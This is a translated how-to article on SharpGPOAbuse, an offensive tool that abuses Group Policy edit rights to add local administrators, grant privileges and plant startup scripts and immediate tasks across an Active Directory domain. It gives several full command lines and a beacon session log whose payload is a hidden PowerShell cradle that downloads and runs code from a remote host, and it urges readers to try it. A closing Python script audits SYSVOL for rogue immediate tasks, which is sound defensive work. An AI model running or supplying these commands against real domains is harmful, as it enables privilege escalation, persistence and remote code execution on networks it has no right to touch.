2025-04-12 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article explains how a user's edit rights on a Group Policy Object (GPO) can be used to control the objects that the GPO manages. The method introduced here is simple, fast and practical.
About SharpGPOAbuse
SharpGPOAbuse is a .NET application written in C#. It lets researchers use a user's edit rights on a Group Policy Object (GPO) in the target system to compromise the objects controlled by that GPO.
Project acquisition
Researchers can use the following commands to clone the source code of the project locally:
git clone https://github.com/FSecureLABS/SharpGPOAbuse.git
Code compilation
Make sure that the necessary NuGet packages on the local host are installed properly, and then you can use Visual Studio to import the project and build it directly.
Tool usage
Usage: SharpGPOAbuse.exe <AttackType>
The current version of SharpGPOAbuse supports the following attack types:
Option               Description
--AddUserRights      Add rights to a user
--AddLocalAdmin      Add a user to the local administrators group
--AddComputerScript  Add a new computer startup script
--AddUserScript      Configure a user logon script
--AddComputerTask    Configure a computer immediate task
--AddUserTask        Add an immediate task to a user
Attack options
Add user rights
Options required to add new user rights:
--UserRights: The new rights to add to the user. This option is case-sensitive and takes a comma-separated list.
--UserAccount: The user account to which the new rights are added.
--GPOName: The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
Add a local administrator
Options required to add a new local admin:
--UserAccount: The account to add to the local administrators group.
--GPOName: The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
Configure a user or computer logon script
Options required to add a new user or computer startup script:
--ScriptName: The name of the new startup script.
--ScriptContents: The contents of the new startup script.
--GPOName: The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
If you only want to execute a malicious script against a specific user or computer controlled by the GPO, you can add an if statement to the malicious script:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
Configure a computer or user immediate task
Options required to add a new computer or user immediate task:
--TaskName: The name of the new computer task.
--Author: The author of the new task (a DA account can be used).
--Command: The command to execute.
--Arguments: The arguments passed to the command.
--GPOName: The name of the vulnerable GPO.
Additional user task options:
--FilterEnabled: Enable target filtering for user immediate tasks.
--TargetUsername: The target user. The malicious task will only run for the specified user, given in the format <DOMAIN>\<USER>.
--TargetUserSID: The SID of the target user.
Additional computer task options:
--FilterEnabled: Enable task filtering.
--TargetDnsName: The DNS name of the target. The malicious task will only run on the target host.
Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
If you only want to run a malicious task against a specific user or computer controlled by the GPO, you can use the following command:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com
Additional options
Option               Description
--DomainController   Set the target domain controller
--Domain             Set the target domain
--Force              Overwrite existing files
Sample tool output
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done
At this point, you should have a deeper understanding of how a user's edit rights on a group policy object can be used to control the objects it manages. Try it out in practice.
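The sample output shows the tool writing ScheduledTasks.xml under the GPO's folder in SYSVOL and raising the version in GPT.ini, and both changes can be reviewed from the defender's side. The following is an added example, not part of the original article or of SharpGPOAbuse: it lists the immediate tasks found under a copy of the Policies folder and decodes the GPT.ini version. The XML sample is constructed, its layout is assumed to follow the Group Policy Preferences format, and all function names are hypothetical.

```python
import configparser
import pathlib
import xml.etree.ElementTree as ET

# Constructed sample, laid out like a GPP ScheduledTasks.xml immediate task (assumed layout).
SAMPLE_XML = """<ScheduledTasks>
  <ImmediateTaskV2 name="Update" changed="2025-01-01 10:00:00">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\\System">
      <Task version="1.3">
        <RegistrationInfo><Author>DOMAIN\\Admin</Author></RegistrationInfo>
        <Actions><Exec><Command>cmd.exe</Command>
          <Arguments>/c placeholder.cmd</Arguments></Exec></Actions>
      </Task>
    </Properties>
    <Filters><FilterComputer type="DNS" name="target.domain.com"/></Filters>
  </ImmediateTaskV2>
</ScheduledTasks>"""

def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop an XML namespace prefix, if any

def immediate_tasks(xml_data):
    """Return name, author, command, arguments and filters of each immediate task."""
    tasks = []
    for el in ET.fromstring(xml_data).iter():
        if not _local(el.tag).startswith("ImmediateTask"):
            continue
        info = {"name": el.get("name"), "changed": el.get("changed"), "filters": []}
        for child in el.iter():
            tag = _local(child.tag)
            if tag in ("Author", "Command", "Arguments"):
                info[tag.lower()] = (child.text or "").strip()
            elif tag.startswith("Filter") and tag != "Filters":
                info["filters"].append((tag, child.get("name")))
        tasks.append(info)
    return tasks

def gpt_versions(gpt_ini_text):
    """Split the GPT.ini Version into (user, computer): high and low 16 bits."""
    ini = configparser.ConfigParser()
    ini.read_string(gpt_ini_text)
    version = ini.getint("General", "Version")
    return version >> 16, version & 0xFFFF

def audit_policies(root):
    """Yield (GPO folder, Machine/User, task) for each immediate task under root."""
    found = pathlib.Path(root).glob("*/*/Preferences/ScheduledTasks/ScheduledTasks.xml")
    for path in sorted(found):
        for task in immediate_tasks(path.read_bytes()):
            yield path.parents[3].name, path.parents[2].name, task
```

Run `audit_policies` against a read-only copy of the domain's Policies folder and compare the tasks and GPT.ini versions it reports with a known-good baseline; an immediate task or version bump with no matching change record is worth investigating.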